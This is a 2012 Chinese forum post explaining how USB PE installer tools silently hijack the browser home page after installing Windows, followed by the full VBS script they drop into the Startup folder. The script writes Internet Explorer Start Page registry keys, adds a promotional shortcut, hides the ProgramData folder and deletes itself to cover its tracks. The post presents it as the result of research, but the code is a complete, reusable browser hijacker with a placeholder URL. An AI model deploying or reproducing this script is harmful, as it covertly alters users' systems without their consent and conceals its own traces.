本帖最后由 BIOS 于 2012/6/30 13:57 编辑
当今USB PE流行,老xx,电xx,大xx 。。安装系统后都会把系统改成他们的主页来赚钱.
最近研究下载了好几个,有的提示:支持xx ..有的是直接静默就替换了安装后系统的主页。
他们都有一个共同点,在C:\Documents and Settings\All Users\「开始」菜单\程序\启动 里面释放一个vbs脚本。
下面安装后修改系统首页的vbs脚本,在进入系统在启动里面运行。- On Error Resume Next '防止出现错误
- set lhwy=createobject("wscript.shell")
- On Error Resume Next '防止出现错误
- path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
- tf=lhwy.regwrite(path,"首页地址")
- set path=nothing
- path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
- tf=lhwy.regwrite(path,"首页地址")
- WScript.Sleep(25000)
- On Error Resume Next '防止出现错误
- set lhwy=createobject("wscript.shell")
- On Error Resume Next '防止出现错误
- path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
- tf=lhwy.regwrite(path,"首页地址")
- set path=nothing
- path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
- tf=lhwy.regwrite(path,"首页地址")
- Const ADMINISTRATIVE_TOOLS = 6
- Set objShell = CreateObject("Shell.Application")
- Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)
- Set objFolderItem = objFolder.Self
- Set objShell = WScript.CreateObject("WScript.Shell")
- strDesktopFld = objFolderItem.Path
- ;收藏夹添加
- Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "\流氓PE官网.url")
- objURLShortcut.TargetPath = "http://www.xxx.xxxxxxx/"
- objURLShortcut.Save
- On Error Resume Next '防止出现错误
- Dim objws,objfso,dn
- Set objws=WScript.CreateObject("wscript.shell")
- Set objfso=CreateObject("scripting.filesystemobject")
- dn=objfso.GetDriveName(WScript.ScriptFullName)
- objws.run "attrib +h " & dn & "\ProgramData",0
- On Error Resume Next '防止出现错误
- Set fso = CreateObject("Scripting.FileSystemObject")
- WScript.Sleep 3000 '将脚本执行挂起1秒
- fso.DeleteFile(WScript.ScriptName) '删除脚本自身
- If fso.FileExists("C:\Documents and Settings\All Users\「开始」菜单\程序\启动\IE.VBS") Then fso.DeleteFile("C:\Documents and Settings\All Users\「开始」菜单\程序\启动\IE.VBS") '删除程序 如果不想删除可以每次都修改主页
- On Error Resume Next '防止出现错误
- Set fso = CreateObject("Scripting.FileSystemObject")
- WScript.Sleep 1000 '将脚本执行挂起1秒
- fso.DeleteFile(WScript.ScriptName) '删除脚本自身
- If fso.FileExists("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IE.VBS") Then fso.DeleteFile("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IE.VBS") '删除程序 如果不想删除可以每次都修改主页
- wscript.quit
复制代码 |